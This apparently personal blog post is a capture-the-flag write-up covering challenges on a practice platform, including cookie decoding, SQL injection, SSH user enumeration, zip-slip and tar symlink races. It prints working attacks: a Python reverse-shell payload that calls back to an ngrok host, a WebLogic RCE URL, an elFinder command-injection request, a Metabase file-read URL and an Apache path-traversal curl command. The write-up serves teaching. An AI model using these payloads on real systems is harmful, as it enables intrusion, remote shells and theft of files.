<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>CTF - LEVEL 101 | k0x55aa</title>
  <meta name="author" content="k0x55aa">
  
  <meta name="description" content="Today I am going to publish a ctf that I played last year LEVEL 101. Hope someone can learn something from it.
Challenge - bhoothClicking the challenge bhooth we are presented with dashboard to launch the instance.

After launching the instance of the challenge, we are presented with an url: screenctf.com:20085 browsing through the challenge, we are presented with a message “Firstly you need to solve me and I will help you out. What you see has everything to answer this problem” which is an html message which means the viewing the source  won’t find anything interesting.

Let’s try to intercept the traffic with burpsuite and see if we are able to find anything of our interest. Intercepting the traffic with the burpsuite and looking the response we see that it will assign us a cookie. Set-cookie: abc&amp;#x3D;Ymhvb3RodW5tYWlu

Taking a look a the cookie we can guess that it’s a base64 encoded string, so let’s try to decode the cookie, Once the cookie has been decoded, we get the string “bhoothunmain”
12$ echo &amp;quot;Ymhvb3RodW5tYWlu&amp;quot; | base64 -dbhoothunmain"> 
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="CTF - LEVEL 101"/>
  <meta property="og:site_name" content="k0x55aa"/>

  
    <meta property="og:image" content=""/>
  

  
    <link rel="alternative" href="/atom.xml" title="k0x55aa" type="application/atom+xml">
  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-70812759-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-70812759-1');
</script>






<meta name="generator" content="Hexo 7.0.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">k0x55aa</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class=""></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="All the categories.">
			  <i class=""></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class=""></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class=""></i>About
			</a>
		  </li>
		  
		  <li>
			<a href="/atom.xml" title="Subscribe me.">
			  <i class=""></i>RSS
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> CTF - LEVEL 101</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  		

	  <p>Today I am going to publish a ctf that I played last year LEVEL 101. Hope someone can learn something from it.</p>
<h1 id="Challenge-bhooth"><a href="#Challenge-bhooth" class="headerlink" title="Challenge - bhooth"></a>Challenge - bhooth</h1><p>Clicking the challenge bhooth we are presented with dashboard to launch the instance.</p>
<p><img src="/2024/03/17/screenctf/screenctf1.png" alt="alt text"></p>
<p>After launching the instance of the challenge, we are presented with an url: screenctf.com:20085 browsing through the challenge, we are presented with a message “Firstly you need to solve me and I will help you out. What you see has everything to answer this problem” which is an html message which means the viewing the source  won’t find anything interesting.</p>
<p><img src="/2024/03/17/screenctf/screenctf2.png" alt="alt text"></p>
<p>Let’s try to intercept the traffic with burpsuite and see if we are able to find anything of our interest. Intercepting the traffic with the burpsuite and looking the response we see that it will assign us a cookie. Set-cookie: abc&#x3D;Ymhvb3RodW5tYWlu</p>
<p><img src="/2024/03/17/screenctf/screenctf3.png" alt="alt text"></p>
<p>Taking a look a the cookie we can guess that it’s a base64 encoded string, so let’s try to decode the cookie, Once the cookie has been decoded, we get the string “bhoothunmain”</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">echo</span> <span class="string">&quot;Ymhvb3RodW5tYWlu&quot;</span> | <span class="built_in">base64</span> -d</span><br><span class="line">bhoothunmain</span><br></pre></td></tr></table></figure>



<p>Let’s try to set the decoded cookie to Cookie: abc&#x3D;bhoothunmain and send the request to the server with Burpsuite Repeater. It reply back with a response which contains our flag FL0G{00cec82a-ebac-492b-915c-fab9b291ec60} as soon below</p>
<p><img src="/2024/03/17/screenctf/screenctf4.png" alt="alt text"></p>
<h1 id="Challenge-waving-flag"><a href="#Challenge-waving-flag" class="headerlink" title="Challenge - waving flag"></a>Challenge - waving flag</h1><p><img src="/2024/03/17/screenctf/screenctf5.png" alt="alt text"></p>
<p>After launching the challenge, screenctf.com:20040 was presented. Click the link we were redirected to youtube waving flag video</p>
<p><img src="/2024/03/17/screenctf/screenctf6.png" alt="alt text"></p>
<p>So to see what it is doing let’s try to capture the request with burpsuite. Capturing the request and sending it to the repeater we see our flag in the response header flag. And we can see the refresh:1; url to the waving flag video which means after the 1 second of the response we will be redirected to the youtube waving flag video</p>
<p><img src="/2024/03/17/screenctf/screenctf7.png" alt="alt text"></p>
<h1 id="Challenge-sqli0"><a href="#Challenge-sqli0" class="headerlink" title="Challenge - sqli0"></a>Challenge - sqli0</h1><p><img src="/2024/03/17/screenctf/screenctf8.png" alt="alt text"></p>
<p>Clicking the challenge sqli0 we are presented with a dashboard to launch the instance.<br><img src="/2024/03/17/screenctf/screenctf9.png" alt="alt text"></p>
<p>After launching the instance, we are present with a site screenctf.com:20039<br>As from the challenge tells us its a Basic sqli test, let’s try to test sql injection payload admin’ or ‘1’&#x3D;’1’– , in the password field put some random value<br><img src="/2024/03/17/screenctf/screenctf10.png" alt="alt text"></p>
<p>Now click login, we will see our flag</p>
<p><img src="/2024/03/17/screenctf/screenctf11.png" alt="alt text"></p>
<h1 id="Challenge-sqli1"><a href="#Challenge-sqli1" class="headerlink" title="Challenge - sqli1"></a>Challenge - sqli1</h1><p><img src="/2024/03/17/screenctf/screenctf12.png" alt="alt text"></p>
<p>Launching the challenge we were given a domain screenctf:20043 it says that “harder than the first one!!”. Let’s intercept the traffic with burpsuite and try to inject sql query. Intercept the request in the repeater, so that we’ll be able to repeat the request and view the response. First query “admin’ or ‘1’&#x3D;’1’–” which gives the response flag{Not_gonna_be_that_easy_this_time}</p>
<p><img src="/2024/03/17/screenctf/screenctf13.png" alt="alt text"></p>
<p>But the flag format was FLOG{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} therefore the query we injected was not the right query.</p>
<p>After a couple trial and error came up with query “admin’;–” which gives the flag</p>
<p><img src="/2024/03/17/screenctf/screenctf14.png" alt="alt text"></p>
<h1 id="Challenge-ssh"><a href="#Challenge-ssh" class="headerlink" title="Challenge - ssh"></a>Challenge - ssh</h1><p><img src="/2024/03/17/screenctf/screenctf15.png" alt="alt text"></p>
<p>Clicking the challenge ssh it says “scan and bruteforce me to get flag!!”, on launch we were given a domain and a port number. Let’s try to see the version of ssh by running a quick nmap scan “sudo nmap -A screenctf.com -p 20056” which is shown in the below image.</p>
<p><img src="/2024/03/17/screenctf/screenctf17.png" alt="alt text"></p>
<p>We can see that the version is detected and it’s running OpenSSH 7.7. After a quick google search for OpenSSH 7.7 vulnerability, we were able to find that it is vulnerable to user enumeration i.e CVE-2018–15473.</p>
<p>Open up msfconsole and try to search to ssh_enumusers or CVE-2018–15473, now we setup the set rhost screenctf.com, set rport 20056 , set username admin or we can set a list of username by seeing the options show options. Once all username, rhost, rport are set, type run or exploit to run the user enumeration. In the below image we can see that the user admin is valid.</p>
<p><img src="/2024/03/17/screenctf/screenctf16.png" alt="alt text"></p>
<p>Now let’s try to login to ssh using username:admin and password:admin which can be done by ssh <a href="mailto:&#x61;&#x64;&#x6d;&#105;&#x6e;&#x40;&#x73;&#99;&#114;&#x65;&#x65;&#x6e;&#x63;&#x74;&#102;&#x2e;&#99;&#111;&#x6d;">&#x61;&#x64;&#x6d;&#105;&#x6e;&#x40;&#x73;&#99;&#114;&#x65;&#x65;&#x6e;&#x63;&#x74;&#102;&#x2e;&#99;&#111;&#x6d;</a>  -p 20056 press enter and we will be asked for the password type admin</p>
<p>Once the password is entered we will login as admin. Let’s try to find the flag by typing “ls”, we will see that we don’t have any interesting file in the admin home directory. Looking for files in the root directory “ls &#x2F;” we will see that we have our flag file, read the flag with “cat flag” will give us the flag as shown below</p>
<p><img src="/2024/03/17/screenctf/screenctf18.png" alt="alt text"></p>
<h1 id="Challenge-smb"><a href="#Challenge-smb" class="headerlink" title="Challenge - smb"></a>Challenge - smb</h1><p><img src="/2024/03/17/screenctf/screenctf19.png" alt="alt text"></p>
<p>Accessing the given domain with smbclient to look for sharenames, command “smbclient -L &#x2F;&#x2F;screenctf.com -p 20000”. When asked for the WORKGROUP password “press enter” to leave it blank. The output retrieved is shown below-</p>
<p>Now try to access the public directory using the command “smbclient &#x2F;&#x2F;screenctf.com&#x2F;public -p 20000” then press enter when asked for password. In the smb prompt type “ls” where we will see our flag file. In order to download the file type “get flag” in the smb prompt as shown below. After the flag is download exit the prompt using “exit” command.</p>
<p><img src="/2024/03/17/screenctf/screenctf20.png" alt="alt text"></p>
<p>Read the downloaded flag file using command “cat flag” where we will see our flag.</p>
<h1 id="Challenge-Zip-As-A-Service"><a href="#Challenge-Zip-As-A-Service" class="headerlink" title="Challenge - Zip As A Service"></a>Challenge - Zip As A Service</h1><p><img src="/2024/03/17/screenctf/screenctf21.png" alt="alt text"></p>
<p>Download the source code file, unzip the file and open up in sublime or any preferred editor. The file of our interest is the admin.py and upload.py inside the app&#x2F;routes directory. If we open up the admin.py we will see that when the current user is admin admin.py triggers it will open up admin.html which will then read the flag from the machine.</p>
<p><img src="/2024/03/17/screenctf/screenctf22.png" alt="alt text"></p>
<p>Now if we try to open the upload.py we will see that it will unzip the uploaded evil.zip file which contains file.txt. And it will write it into upload&#x2F;evil&#x2F;file.txt now the problem about the code is that it is not checking for any filename with ..&#x2F;..&#x2F; so if a filename contains ..&#x2F;file.txt then after unzipping the file will write it into upload&#x2F;file.txt instead of upload&#x2F;evil&#x2F;file.txt</p>
<p><img src="/2024/03/17/screenctf/screenctf23.png" alt="alt text"></p>
<p>So in order to exploit this vulnerable implementation we have to overwrite and of the execute .py files with our own payload. But in order to configure our machine  with a reverse shell we need to expose our machine to the public which can be done with ngrok. Download the ngrok and configure it on your machine and run the following command to received reverse connection on port 5555. .&#x2F;ngrok tcp 5555 it will give us a public tcp domain and a port number which in this case domain - 0.tcp.in.ngrok.io, port - 12424<br><img src="/2024/03/17/screenctf/screenctf24.png" alt="alt text"></p>
<p>To create the payload use the following code below -</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> zipfile</span><br><span class="line">z_filename = zipfile.ZipInfo(<span class="string">r&quot;../../routes/admin.py&quot;</span>)</span><br><span class="line">z_file = zipfile.ZipFile(<span class="string">&quot;./evil.zip&quot;</span>, mode=<span class="string">&quot;w&quot;</span>)</span><br><span class="line">z_file.writestr(z_filename, <span class="string">&#x27;import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;0.tcp.in.ngrok.io&quot;,12424));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(&quot;/bin/sh&quot;)&#x27;</span>)</span><br><span class="line">z_filename.external_attr = 0777 &lt;&lt; <span class="number">16L</span></span><br><span class="line">z_file.close()</span><br></pre></td></tr></table></figure>

<p>The code above will first create a python file name as “..&#x2F;..&#x2F;routes&#x2F;admin” which is z_filename and the z_file will create a zip file known as evil.zip, next we are writing our reverse shell payload into the ..&#x2F;..&#x2F;routes&#x2F;admin.py and then we are setting the zip file permission to 0777 with full permission RWX read,write,execute after that file is closed. Before uploading the zipfile run the listener with nc -nlp 5555 and after try uploading the zipfile to given domain. Once the zip file is uploaded we will see that our reverse shell connects back and we will see a $ sign try running ls to see the list of files present in the directory. After running ls we see our flag file, try reading the flag with cat and we see our flag pop up.</p>
<p><img src="/2024/03/17/screenctf/screenctf25.png" alt="alt text"></p>
<h1 id="Challenge-Tar-As-A-Service"><a href="#Challenge-Tar-As-A-Service" class="headerlink" title="Challenge - Tar As A Service"></a>Challenge - Tar As A Service</h1><p><img src="/2024/03/17/screenctf/screenctf26.png" alt="alt text"></p>
<p>Description tells us that it has vulnerable tar service which needs to be exploited. After downloading the source and reviewing it we can see that the uploaded file is extracted first and later it checks for a symlink file which is done by is_reg() if the file is a symlink then it removes the file. Since the symlink file is checked after extraction which means that there is a time interval when the file gets deleted.</p>
<p><img src="/2024/03/17/screenctf/screenctf27.png" alt="alt text"></p>
<p>Now lets try see the admin.py we can see that if the user is admin, admin.py will fetch admin.html</p>
<p><img src="/2024/03/17/screenctf/screenctf28.png" alt="alt text"></p>
<p>If we try to look at the content of admin.html we can see that it renders flag after Flag:</p>
<p><img src="/2024/03/17/screenctf/screenctf29.png" alt="alt text"></p>
<p>In order to exploit this vulnerability we can link our file to point to admin.html by using ln -s ..&#x2F;..&#x2F;templates&#x2F;admin.html link.txt which will retrieve the content of admin.html. So in order to increase the time of our link.txt we need upload big two file - one is our link.txt file and the other is a random big file. If we tar the files tar -cf payload.tar link.txt bigfile then the decompression will start at link.txt file and later to bigfile the more big the file is the more time we have to fetch the link.txt<br>In order to create a random bigfile we can use dd if&#x3D;&#x2F;dev&#x2F;urandom of&#x3D;bigfile bs&#x3D;1048576 count&#x3D;200 this will create us a 200 mb file</p>
<p>The code to upload the file is shown below<br><img src="/2024/03/17/screenctf/screenctf30.png" alt="alt text"></p>
<p>The code to retrieve the flag is shown below which make infinite request and search for word “Flag” in the response<br><img src="/2024/03/17/screenctf/screenctf31.png" alt="alt text"></p>
<p>Screenshot showing retrieving flag and uploading payload locally,</p>
<p><img src="/2024/03/17/screenctf/screenctf32.png" alt="alt text"></p>
<p>Screenshot showing the  uploading the payload and getting the flag from the challenge.</p>
<p><img src="/2024/03/17/screenctf/screenctf33.png" alt="alt text"></p>
<h1 id="Challenge-weblogic"><a href="#Challenge-weblogic" class="headerlink" title="Challenge - weblogic"></a>Challenge - weblogic</h1><p><img src="/2024/03/17/screenctf/screenctf34.png" alt="alt text"></p>
<p>Challenge description says that it’s a vulnerable application and tells us to navigate to &#x2F;console to access and it also tells us to exploit at root directory, so most likely the flag is in root “&#x2F;” directory.</p>
<p>Accessing the application at <a target="_blank" rel="noopener" href="http://screenctf.com:20055/console">http://screenctf.com:20055/console</a>  redirects us to a login page of weblogic.<br><img src="/2024/03/17/screenctf/screenctf35.png" alt="alt text"></p>
<p>Initial approach I tried while trying to solve the challenge was trying default credentials of weblogic <a target="_blank" rel="noopener" href="https://cirt.net/passwords?criteria=weblogic">https://cirt.net/passwords?criteria=weblogic</a> which didn’t turns out to be success</p>
<p><img src="/2024/03/17/screenctf/screenctf36.png" alt="alt text"></p>
<p>Next approach is trying to see the weblogic version, intercepting through the burp and requesting the login portal gives us the version of weblogin in the response<br>If we look for weblogic server version 12.2.1.3.0 we see that it is vulnerable to unauthenticated RCE via GET request i.e CVE-2020-14882</p>
<p>If we request the </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://screenctf.com:20055/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&amp;_pageLable=&amp;handle=com.tangosol.coherence.mvel2.sh.ShellSession(\%22java.lang.Runtime.getRuntime().exec(%27%22%20+%20id+%20%22%27);\%22); </span><br></pre></td></tr></table></figure>
<p>we can login to the weblogic but only problem we had here is the the command “id” we request we didn’t get back the response</p>
<p><img src="/2024/03/17/screenctf/screenctf37.png" alt="alt text"></p>
<p>So later I found it is vulnerable to CVE-2020-14750 the exploit code can be found here in this repo <a target="_blank" rel="noopener" href="https://github.com/pprietosanchez/CVE-2020-14750">https://github.com/pprietosanchez/CVE-2020-14750</a> which sends post request to create a shell if the server is window it create a shell cmd.exe and if it is linux it will create a shell &#x2F;bin&#x2F;sh and pass the prepared command which is pass as custom header cmd: {command}. The output of the exploit is shown below.</p>
<p><img src="/2024/03/17/screenctf/screenctf38.png" alt="alt text"></p>
<p>Reference:<br><a target="_blank" rel="noopener" href="https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf">https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf</a><br><a target="_blank" rel="noopener" href="https://cirt.net/passwords?criteria=weblogic">https://cirt.net/passwords?criteria=weblogic</a><br><a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/48971">https://www.exploit-db.com/exploits/48971</a><br><a target="_blank" rel="noopener" href="https://github.com/pprietosanchez/CVE-2020-14750">https://github.com/pprietosanchez/CVE-2020-14750</a></p>
<h1 id="Challenge-metabase"><a href="#Challenge-metabase" class="headerlink" title="Challenge - metabase"></a>Challenge - metabase</h1><p><img src="/2024/03/17/screenctf/screenctf39.png" alt="alt text"></p>
<p>The challenge description tells us that the setup is a metabase instance and it’s vulnerable to metabase application, after the metabase setup we navigate to settings to see the version of metabase , it’s using version v0.40.4.<br>After some google search I end up looking at the security issue related to metabase <a target="_blank" rel="noopener" href="https://github.com/metabase/metabase/security/advisories/">https://github.com/metabase/metabase/security/advisories/</a></p>
<p>Found the advisory - Incomplete validation of GeoJSON api can lead to exposing local files or environment variables to admin users .<br><img src="/2024/03/17/screenctf/screenctf40.png" alt="alt text"></p>
<p>As articulate in the advisory I tried to found the path traversal and found out in &#x2F;api&#x2F;geojson?url&#x3D;file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd will retrieve the passwd file as response<br><img src="/2024/03/17/screenctf/screenctf41.png" alt="alt text"></p>
<p>Now we try to read the flag using url&#x3D;file:&#x2F;&#x2F;&#x2F;flag, we get our flag in the response</p>
<p><img src="/2024/03/17/screenctf/screenctf42.png" alt="alt text"></p>
<h1 id="Challenge-elfinder"><a href="#Challenge-elfinder" class="headerlink" title="Challenge - elfinder"></a>Challenge - elfinder</h1><p><img src="/2024/03/17/screenctf/screenctf43.png" alt="alt text"></p>
<p>The challenge description tells us that it has a vulnerable version of elfinder, when we launch the challenge. We are given the elfinder dashboard, to know what version is use we have to click the blue question mark in the elfinder which gives us the version running 2.1.58 as shown in figure</p>
<p><img src="/2024/03/17/screenctf/screenctf44.png" alt="alt text"></p>
<p>FIrst thing we create is one text file name 1.txt then we zip that txt file in zip archive naming 2.zip.<br>Now let’s try to intercept the traffic in burp and send the request to repeater, replace the repeater request url with<br><code>/php/connector.minimal.php?cmd=archive&amp;name=-TvTT=id&gt;shell.php%20%23%20a.zip&amp;target=l1_Lw&amp;targets%5B1%5D=l1_Mi56aXA&amp;targets%5B0%5D=l1_MS50eHQ&amp;type=application%2Fzip</code></p>
<p><img src="/2024/03/17/screenctf/screenctf45.png" alt="alt text"></p>
<p>The important parameter in the request url is  target[0]&#x3D;l1_MS50eHQ and target[1]&#x3D;l1_Mi56aXA which is the txt and zip file base64 encoded target value consecutively when the file was created. The important parameter is name&#x3D;-TvTT&#x3D;id&gt;shell.php where main command injection is cause through name, the command “id” stored in shell.php, this id para can change to any desired command we want, %20%23%20a.zip is appended to fake the elfinder in believing that the file is a zip because of the parameter cmd&#x3D;archive</p>
<p><img src="/2024/03/17/screenctf/screenctf46.png" alt="alt text"></p>
<p>Once the request is sent we can see that the response shows us error but when we navigate to &#x2F;files&#x2F;shell.php we are able to see that our command has executed.<br><img src="/2024/03/17/screenctf/screenctf47.png" alt="alt text"></p>
<p>When I tried to put the command cat &#x2F;flag the response I got was blank which means it didn’t execute so it looks like we can only do some limited commands. So in order to get the flag, the system reads the cat &#x2F;flag command and pipes it to  sh. So I tried to edit the file 1.txt then write cat &#x2F;flag</p>
<p><img src="/2024/03/17/screenctf/screenctf48.png" alt="alt text"></p>
<p>Now the system should read 1.txt and pass it through sh to execute the flag i.e (cat+1.txt | sh)&gt;shell.php, the request is shown below<br><img src="/2024/03/17/screenctf/screenctf49.png" alt="alt text"></p>
<p>Navigating &#x2F;files&#x2F;shell.php gives us the flag<br><img src="/2024/03/17/screenctf/screenctf50.png" alt="alt text"></p>
<p>Reference:<br><a target="_blank" rel="noopener" href="https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17">https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17</a><br><a target="_blank" rel="noopener" href="https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities">https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities</a><br><a target="_blank" rel="noopener" href="https://packetstormsecurity.com/files/164173/elfinder_archive_cmd_injection.rb.txt">https://packetstormsecurity.com/files/164173/elfinder_archive_cmd_injection.rb.txt</a></p>
<p>Challenge - httpd</p>
<p><img src="/2024/03/17/screenctf/screenctf51.png" alt="alt text"></p>
<p>When we navigate  to the challenge url we see the following response: it works. While intercepting the burp we didn’t see anything interesting.</p>
<p>So taking the url and port tried to scan the target what is the service running and version detection using nmap.</p>
<p><img src="/2024/03/17/screenctf/screenctf52.png" alt="alt text"></p>
<p>As we can see, it is running a vulnerable version of httpd 2.4.50 which is vulnerable to path traversal CVE-2021-42013 . The exploit can be found in <a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/50406">https://www.exploit-db.com/exploits/50406</a></p>
<p>As we can see that exploit is doing path traversal  %%32%65%32%65 which is the double url encode version of “..” and we pass the file we want to shell path &#x2F;bin&#x2F;sh  and third parameter is the command we can the exploit to execute on the system $host is the grabbing urls from a file because the exploit takes a list of urls and execute the same command consecutively.<br><img src="/2024/03/17/screenctf/screenctf53.png" alt="alt text"></p>
<p>The output and the use is show in the modified simple version of the exploit<br><code>curl -s --path-as-is -d &quot;echo Content-Type: text/plain; echo; $3&quot; &quot;$1/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2&quot;</code><br><img src="/2024/03/17/screenctf/screenctf54.png" alt="alt text"></p>
<p>Reference: <a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/50406">https://www.exploit-db.com/exploits/50406</a> </p>

	  <div class="article-footer-copyright">

    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank"></a>
</div>

	</div>

	
	
	<div>
  	<center>

	<div class="pagination">

    
    
    <a href="/2024/10/14/decryptingfirmware/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2024/03/16/format-string1/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


    </center>
	</div>
	
	<!-- comment -->
	<!--
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>

-->
	
	
	
	</div> <!-- col-md-9/col-md-12 -->


	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2024-03-17 
	</div>
	

	<!-- categories -->
    

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/web-application/">web application<span>1</span></a></li> <li><a href="/tags/web-hacking/">web hacking<span>1</span></a></li> <li><a href="/tags/web101/">web101<span>1</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

		

	</div>
	
		

</div><!-- row -->

<!--
 -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
  &copy; 2024 k0x55aa's Blog
  
      powered by <a href="http://hexo.io/" target="_blank">Hexo</a>.Theme <a href="https://github.com/Ares-X/hexo-theme-freemind.bithack" target="_blank">freemind.bithack</a>  
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"tagMode":false,"debug":false,"model":{"scale":1,"hHeadPos":0.5,"vHeadPos":0.618,"jsonPath":"https://raw.githubusercontent.com/iCharlesZ/vscode-live2d-models/master/model-library/girls-frontline/M4-SOPMOD-II-2/normal/model.json"},"display":{"position":"right","superSample":2,"width":200,"height":450,"hOffset":30,"vOffset":-20},"mobile":{"position":"bottom","width":100,"height":100,"show":true,"scale":0.5,"hOffset":1,"vOffset":-1},"react":{"opacityDefault":1,"opacityOnHover":0.2},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/"});</script></body>
   </html>
